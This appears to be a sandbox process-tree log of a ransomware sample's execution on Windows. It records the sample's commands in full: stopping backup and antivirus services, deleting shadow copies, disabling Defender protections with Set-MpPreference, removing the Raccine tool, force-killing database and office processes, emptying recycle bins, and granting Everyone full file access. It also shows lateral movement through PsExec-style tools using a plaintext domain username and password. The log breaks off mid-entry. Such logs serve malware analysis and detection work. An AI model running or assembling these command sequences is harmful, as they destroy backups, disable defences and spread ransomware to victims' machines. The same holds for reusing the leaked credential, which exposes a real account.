  "net.exe" stop PDVFSService /y
  2⤵
  PID:5748
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop veeam /y
  2⤵
  PID:5672
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:5616
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:5544
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop zhudongfangyu /y
  2⤵
  PID:5276
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:5324
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcrSch2Svc /y
    3⤵
    PID:5804
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
  2⤵
  PID:5200
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.24 /USER:SHJPOLICE\amer !Omar2012
  2⤵
  PID:5548
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:5668
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:5788
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:5968
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:5560
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:5648
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:5308
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:4476
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:4268
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:5264
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:5696
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:4484
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:4968
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:4832
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:5568
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:4176
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  PID:4884
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  PID:4708
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:4768
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:5388
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:5460
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:6084
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop sophos /y
  2⤵
  PID:5728
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CAARCUpdateSvc /y
  2⤵
  PID:4288
- C:\Users\Admin\AppData\Local\Temp\lkvf3rwq.exe
  "C:\Users\Admin\AppData\Local\Temp\lkvf3rwq.exe" \10.10.0.24 -u SHJPOLICE\amer -p !Omar2012 -d -f -h -s -n 2 -c C:\Users\Admin\AppData\Local\Temp\79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
  2⤵
  PID:5740
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CASAD2DWebSvc /y
  2⤵
  PID:4888
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:4964
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:4376
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:5628
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:5640
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooIT /y
  2⤵
  PID:5196
- C:\Windows\SYSTEM32\arp.exe
  "arp" -a
  2⤵
  PID:6084
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooBackup /y
  2⤵
  PID:5124
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop Intuit.QuickBooks.FCS /y
  2⤵
  PID:4600
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBFCService /y
  2⤵
  PID:4448
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop RTVscan /y
  2⤵
  PID:4220
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop DefWatch /y
  2⤵
  PID:4980
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
  2⤵
  PID:5412
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:5364
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:6060
- - C:\Windows\system32\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:5968
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
  2⤵
  PID:5236
- - C:\Windows\system32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:4136

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
1⤵
PID:5640
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop BackupExecJobEngine /y
  2⤵
  PID:4752

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
1⤵
PID:5696

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop veeam /y
1⤵
PID:5932

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
1⤵
PID:5164

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
1⤵
PID:5924

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
1⤵
PID:5380

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooBackup /y
1⤵
PID:5988

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooIT /y
1⤵
PID:5976

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop zhudongfangyu /y
1⤵
PID:5964

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
1⤵
PID:5724

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop RTVscan /y
1⤵
PID:5492

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
1⤵
- Suspicious use of WriteProcessMemory
PID:4772
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
  2⤵
  PID:1460

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sophos /y
1⤵
PID:5544

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
1⤵
PID:5672

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
1⤵
PID:5124

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
1⤵
PID:5328

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:5572

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop DefWatch /y
1⤵
PID:5220

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:5504

C:\Windows\PAExec-4788-RJMQBVDN.exe
C:\Windows\PAExec-4788-RJMQBVDN.exe -service
1⤵
PID:1272
- C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
  "C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe"
  2⤵
  PID:5420
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" Get-MpPreference -verbose
    3⤵
    PID:6008
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
    3⤵
    PID:5608
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
    3⤵
    PID:5564
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
    3⤵
    PID:2420
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
    3⤵
    PID:4276
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
    3⤵
    PID:4012
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
    3⤵
    PID:4100
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
    3⤵
    PID:4796
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
    3⤵
    PID:4504
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
    3⤵
    PID:5176
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
    3⤵
    PID:4992
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
    3⤵
    PID:4700
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
    3⤵
    PID:5836
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    PID:5904
- - C:\Windows\system32\taskkill.exe
    "taskkill" /F /IM RaccineSettings.exe
    3⤵
    - Kills process with taskkill
    PID:4572
- - C:\Windows\system32\reg.exe
    "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
    3⤵
    PID:5308
- - C:\Windows\system32\reg.exe
    "reg" delete HKCU\Software\Raccine /F
    3⤵
    - Modifies registry key
    PID:2184
- - C:\Windows\system32\schtasks.exe
    "schtasks" /DELETE /TN "Raccine Rules Updater" /F
    3⤵
    PID:6052
- - C:\Windows\system32\sc.exe
    "sc.exe" config Dnscache start= auto
    3⤵
    PID:3464
- - C:\Windows\system32\sc.exe
    "sc.exe" config FDResPub start= auto
    3⤵
    PID:1584
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLTELEMETRY start= disabled
    3⤵
    PID:5348
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:1444
- - C:\Windows\system32\sc.exe
    "sc.exe" config SSDPSRV start= auto
    3⤵
    PID:5796
- - C:\Windows\system32\sc.exe
    "sc.exe" config SstpSvc start= disabled
    3⤵
    PID:5128
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
    3⤵
    PID:5852
- - C:\Windows\system32\sc.exe
    "sc.exe" config upnphost start= auto
    3⤵
    PID:4892
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLWriter start= disabled
    3⤵
    PID:5272
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    - Kills process with taskkill
    PID:2888
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM synctime.exe /F
    3⤵
    - Kills process with taskkill
    PID:4144
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    PID:1092
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    - Kills process with taskkill
    PID:5400
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM Ntrtscan.exe /F
    3⤵
    - Kills process with taskkill
    PID:4356
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    - Kills process with taskkill
    PID:5184
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqbcoreservice.exe /F
    3⤵
    - Kills process with taskkill
    PID:4972
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM isqlplussvc.exe /F
    3⤵
    PID:5704
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM PccNTMon.exe /F
    3⤵
    - Kills process with taskkill
    PID:1008
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM agntsvc.exe /F
    3⤵
    - Kills process with taskkill
    PID:1380
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld.exe /F
    3⤵
    - Kills process with taskkill
    PID:4808
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM firefoxconfig.exe /F
    3⤵
    - Kills process with taskkill
    PID:4524
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM onenote.exe /F
    3⤵
    - Kills process with taskkill
    PID:4736
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM msaccess.exe /F
    3⤵
    PID:3108
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM thebat.exe /F
    3⤵
    - Kills process with taskkill
    PID:4876
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM steam.exe /F
    3⤵
    - Kills process with taskkill
    PID:5564
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:996
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM outlook.exe /F
    3⤵
    - Kills process with taskkill
    PID:5164
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlwriter.exe /F
    3⤵
    - Kills process with taskkill
    PID:3464
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    - Kills process with taskkill
    PID:5812
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM tmlisten.exe /F
    3⤵
    PID:3956
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM encsvc.exe /F
    3⤵
    - Kills process with taskkill
    PID:4824
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocomm.exe /F
    3⤵
    - Kills process with taskkill
    PID:4212
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM tbirdconfig.exe /F
    3⤵
    - Kills process with taskkill
    PID:4452
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM visio.exe /F
    3⤵
    - Kills process with taskkill
    PID:2084
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM infopath.exe /F
    3⤵
    PID:4412
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2768
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM msftesql.exe /F
    3⤵
    - Kills process with taskkill
    PID:5476
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM excel.exe /F
    3⤵
    PID:732
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM dbeng50.exe /F
    3⤵
    - Kills process with taskkill
    PID:4664
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    PID:4564
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mbamtray.exe /F
    3⤵
    - Kills process with taskkill
    PID:5028
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM powerpnt.exe /F
    3⤵
    - Kills process with taskkill
    PID:4720
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM winword.exe /F
    3⤵
    - Kills process with taskkill
    PID:5808
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM CNTAoSMgr.exe /F
    3⤵
    PID:4732
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM thebat64.exe /F
    3⤵
    PID:5900
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM zoolz.exe /F
    3⤵
    PID:4160
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld-nt.exe /F
    3⤵
    PID:4984
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlservr.exe /F
    3⤵
    - Kills process with taskkill
    PID:5580
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" IM thunderbird.exe /F
    3⤵
    - Kills process with taskkill
    PID:2024
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM dbsnmp.exe /F
    3⤵
    PID:4408
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM wordpad.exe /F
    3⤵
    - Kills process with taskkill
    PID:5316
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
    3⤵
    PID:5212
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld-opt.exe /F
    3⤵
    - Kills process with taskkill
    PID:5092
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM xfssvccon.exe /F
    3⤵
    PID:4316
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocautoupds.exe /F
    3⤵
    PID:4184
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocssd.exe /F
    3⤵
    - Kills process with taskkill
    PID:4224
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM oracle.exe /F
    3⤵
    - Kills process with taskkill
    PID:4140
- - C:\Windows\system32\arp.exe
    "arp" -a
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:376
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlagent.exe /F
    3⤵
    PID:5792
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlbrowser.exe /F
    3⤵
    - Kills process with taskkill
    PID:6124
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ragent.exe /f
    3⤵
    PID:5228
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqld.exe /f
    3⤵
    PID:5200
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysql.exe /f
    3⤵
    PID:4784
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM rmngr.exe /f
    3⤵
    - Kills process with taskkill
    PID:5248
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM 1cv8.exe /f
    3⤵
    - Kills process with taskkill
    PID:5784
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM rphost.exe /f
    3⤵
    - Kills process with taskkill
    PID:5788
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM oracle.exe /f
    3⤵
    PID:5232
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld.exe /f
    3⤵
    - Kills process with taskkill
    PID:5444
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sql.exe /f
    3⤵
    PID:4816
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM vmwp.exe /f
    3⤵
    - Kills process with taskkill
    PID:5176
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
    3⤵
    PID:3432
- - C:\Windows\system32\icacls.exe
    "icacls" "D:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:4580
- - C:\Windows\system32\icacls.exe
    "icacls" "Z:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5492
- - C:\Windows\system32\icacls.exe
    "icacls" "C:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5656
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /C C:\Windows\TEMP\tmpD802.bat
    3⤵
    PID:5520
  - - C:\Windows\system32\mountvol.exe
      mountvol
      4⤵
      PID:4944
  - - C:\Windows\system32\find.exe
      find "}\"
      4⤵
      PID:4544
  - - C:\Windows\system32\mountvol.exe
      mountvol !freedrive!: \\?\Volume{266d1ca4-0000-0000-0000-500600000000}\
      4⤵
      PID:4236
  - - C:\Windows\system32\PING.EXE
      ping -n 2 127.0.0.1
      4⤵
      Runs ping.exe
      Suspicious use of AdjustPrivilegeToken
      PID:4180
  - - C:\Windows\system32\mountvol.exe
      mountvol !freedrive!: \\?\Volume{266d1ca4-0000-0000-0000-100000000000}\
      4⤵
      PID:4732
  - - C:\Windows\system32\PING.EXE
      ping -n 2 127.0.0.1
      4⤵
      Runs ping.exe
      PID:1376
  - - C:\Windows\system32\mountvol.exe
      mountvol !freedrive!: \\?\Volume{63e50be4-9a0d-11eb-a110-806e6f6e6963}\
      4⤵
      PID:5300
  - - C:\Windows\system32\PING.EXE
      ping -n 2 127.0.0.1
      4⤵
      Runs ping.exe
      PID:5628
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
    3⤵
    PID:4796
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c rd /s /q D:\\$Recycle.bin
    3⤵
    PID:6080
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:5824
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
    3⤵
    PID:5608
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5444
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:1272
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Cache\data_0 /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5044
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5536
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5960
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\confident.cov /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5476
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\fyi.cov /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5236
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\generic.cov /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:4068
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\urgent.cov /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:4700

C:\Windows\PSEXESVC.exe
C:\Windows\PSEXESVC.exe
1⤵
PID:5644
- C:\Windows\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
  "714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"
  2⤵
  PID:4500
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill" /F /IM RaccineSettings.exe
    3⤵
    PID:1748
- - C:\Windows\SysWOW64\reg.exe
    "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
    3⤵
    PID:4368
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4000
- - C:\Windows\SysWOW64\reg.exe
    "reg" delete HKCU\Software\Raccine /F
    3⤵
    - Modifies registry key
    PID:3108
- - C:\Windows\SysWOW64\schtasks.exe
    "schtasks" /DELETE /TN "Raccine Rules Updater" /F
    3⤵
    PID:5268
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config Dnscache start= auto
    3⤵
    PID:5532
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config SQLTELEMETRY start= disabled
    3⤵
    PID:4616
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4980
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config FDResPub start= auto
    3⤵
    PID:4708
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
    3⤵
    PID:2456
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config SSDPSRV start= auto
    3⤵
    PID:5796
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config SstpSvc start= disabled
    3⤵
    PID:5812
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config SQLWriter start= disabled
    3⤵
    PID:5712
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config upnphost start= auto
    3⤵
    PID:4728
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM synctime.exe /F
    3⤵
    - Kills process with taskkill
    PID:6008
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    - Kills process with taskkill
    PID:5592
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    - Kills process with taskkill
    PID:4136
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    PID:5608
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    PID:4384
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
    3⤵
    PID:4544
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM onenote.exe /F
    3⤵
    PID:6108
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mysqld.exe /F
    3⤵
    PID:4192
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM agntsvc.exe /F
    3⤵
    PID:5700
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c rd /s /q D:\\$Recycle.bin
    3⤵
    PID:5848
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM Ntrtscan.exe /F
    3⤵
